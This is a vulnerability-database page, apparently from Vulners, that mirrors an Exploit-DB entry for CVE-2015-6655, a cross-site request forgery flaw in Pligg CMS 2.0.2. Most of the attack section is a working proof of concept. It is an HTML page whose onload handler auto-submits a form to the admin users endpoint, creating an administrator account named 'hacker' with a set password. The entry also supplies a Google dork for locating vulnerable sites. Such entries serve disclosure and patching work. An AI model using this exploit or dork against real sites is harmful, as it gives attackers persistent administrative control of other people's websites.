Lucene search
K

Pligg CMS 2.0.2 - Cross-Site Request Forgery (Add Admin)

🗓️ 24 Aug 2015 00:00:00Reported by Arash KhazaeiType 
exploitdb
 exploitdb
🔗 www.exploit-db.com👁 116 Views

Pligg CMS 2.0.2 CSRF vulnerability allows attackers to add admin users through the pane

Related
Code
ReporterTitlePublishedViews
Family
0day.today
Pligg CMS 2.0.2 - CSRF Add Admin Exploit
25 Aug 201500:00
zdt
CNVD
Pligg CMS 'admin/admin_users.php' Cross-Site Request Forgery Vulnerability
2 Sep 201500:00
cnvd
Check Point Advisories
Pligg CMS Cross Site Request Forgery (CVE-2015-6655)
21 Dec 202000:00
checkpoint_advisories
CVE
CVE-2015-6655
31 Aug 201519:00
cve
Cvelist
CVE-2015-6655
31 Aug 201519:00
cvelist
EUVD
EUVD-2015-6593
7 Oct 202500:30
euvd
exploitpack
Pligg CMS 2.0.2 - Cross-Site Request Forgery (Add Admin)
24 Aug 201500:00
exploitpack
NVD
CVE-2015-6655
31 Aug 201519:59
nvd
Packet Storm
Pligg CMS 2.0.2 Cross Site Request Forgery
25 Aug 201500:00
packetstorm
Prion
Cross site request forgery (csrf)
31 Aug 201519:59
prion
Rows per page
<!--
# Exploit Title: Pligg CMS CSRF Add Admin Exploit
# Google Dork: intext:"Made wtih Pligg CMS"
# Date: 2015/8/20
# Exploit Author: Arash Khazaei
# Vendor Homepage: http://pligg.com
# Software Link:
https://github.com/Pligg/pligg-cms/releases/download/2.0.2/2.0.2.zip
# Version: 2.0.2
# Tested on: Kali , Iceweasel Browser
# CVE : CVE-2015-6655
# Contact : http://twitter.com/0xClay
# Mail : [email protected]
# Site : http://bhunter.ir

# Description :

# Pligg CMS Is A CMS Written In PHP Language And Licensed Under GPL V 2.0
# In Pligg CMS Panel In Adding Users Section Pligg CMS Allow To Attacker
Add Admin By CSRF
# Vulnerability In Add Users Sections . Another Thing Is Added Admin By
CSRF Vulnerability
# Can't Deleted By Admin :) And Admin Should Delete It From Database .

# Exploit :
-->
<body onload="document.exploit.submit();">
<form action="http://localhost/pligg-cms-master/admin/admin_users.php"
method="post" id="createUserForm" name="exploit" onsubmit="return
checkValidation()">
<input name="username" type="text" class="form-control" id="username"
value="hacker"  onchange="checkUsername(this.value)" />
<input name="email" type="text" class="form-control" id="email" value="
[email protected]" onchange="checkEmail(this.value)"/>
<select name="level">
<option value="admin">Admin</option>
</select>
<input name="password" type="text" class="form-control" id="password"
value="hacker123" onchange="checkPassword(this.value)"/>
<input type="hidden" name="mode" value="newuser">
<input type="submit" class="btn btn-primary" value="Create User"/>

</form>
<!--

Timeline :
21/5/2015 Reported To Developer Team .
22/5/2015 No Responde From Developer Team.
22/5/2015 Request CVE
23/5/2015 Published Vulnerability


# Note: Change The Values Of Exploit To Another Thing :)

# Discovered By Arash Khazaei . (Aka JunkyBoy (Nick Name Changed :P ))

-->

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation

24 Aug 2015 00:00Current
6.6Medium risk
Vulners AI Score6.6
CVSS 26.8
EPSS0.00219
116